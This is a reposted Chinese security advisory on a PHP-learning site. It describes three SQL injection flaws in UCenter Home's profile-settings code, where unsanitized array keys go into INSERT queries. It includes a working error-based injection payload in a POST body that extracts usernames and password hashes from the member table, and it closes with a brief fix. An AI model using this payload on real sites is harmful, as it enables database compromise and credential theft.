来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] Ucenter Home最新版SQL注入三处详细说明:从官方下载最新版Ucenter Home第一处SQL注入:个人设置个人资料基本资料文件 source cp_profile php:if($_GET[op] == base) {if(submitcheck(profile...
从官方下载最新版Ucenter Home
if($_GET['op'] == 'base') { if(submitcheck('profilesubmit') || submitcheck('nextsubmit')) { if(!@include_once(S_ROOT.'./data/data_profilefield.php')) { include_once(S_ROOT.'./source/function_cache.php'); profilefield_cache(); } $profilefields = empty($_SGLOBAL['profilefield'])?array():$_SGLOBAL['profilefield']; ...... //隐私 $inserts = array(); foreach ($_POST['friend'] as $key => $value) { $value = intval($value); $inserts[] = "('base','$key','$space[uid]','$value')"; } if($inserts) { $_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='base'"); $_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type,subtype,uid,friend) VALUES ".implode(',', $inserts)); }
$inserts = array(); foreach ($_POST['friend'] as $key => $value) { $value = intval($value); $inserts[] = "('base','$key','$space[uid]','$value')"; }
$_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type,subtype,uid,friend) VALUES ".implode(',', $inserts));
elseif ($_GET['op'] == 'info') { if(submitcheck('profilesubmit')) { $inserts = array(); foreach ($_POST['info'] as $key => $value) { $value = getstr($value, 500, 1, 1); $friend = intval($_POST['info_friend'][$key]); $inserts[] = "('$space[uid]','info','$key','$value','$friend')"; } if($inserts) { $_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='info'"); $_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (uid,type,subtype,title,friend) VALUES ".implode(',', $inserts)); }
elseif ($_GET['op'] == 'contact') { if($_GET['resend']) { //重新发送邮箱验证 $toemail = $space['newemail']?$space['newemail']:$space['email']; emailcheck_send($space['uid'], $toemail); showmessage('do_success', "cp.php?ac=profile&op=contact"); } ...... //隐私 $inserts = array(); foreach ($_POST['friend'] as $key => $value) { $value = intval($value); $inserts[] = "('contact','$key','$space[uid]','$value')"; } if($inserts) { $_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='contact'"); $_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type,subtype,uid,friend) VALUES ".implode(',', $inserts)); }
第一处SQL证明:
name=111111&sex=1&marry=1&friend%5Bmarry%5D=0&birthyear=2014&birthmonth=7&birthday=25&friend%5Bbirth%5D=0&blood=AB&friend%5Bblood%5D=0&birthprovince=%E5%8C%97%E4%BA%AC&birthcity=%E4%B8%9C%E5%9F%8E&friend%5Bbirthcity%5D=0&resideprovince=%E5%8C%97%E4%BA%AC&residecity=%E4%B8%9C%E5%9F%8E&friend%5Bresidecity%5D=0&profilesubmit=%E4%BF%9D%E5%AD%98&formhash=6acac340&friend[key',(select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(username, 0x23, password) from uchome_member limit 0,1))a from information_schema.tables group by a)b),'value')#]=sqli
修复方案:对key值进行处理后再进入sql。 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com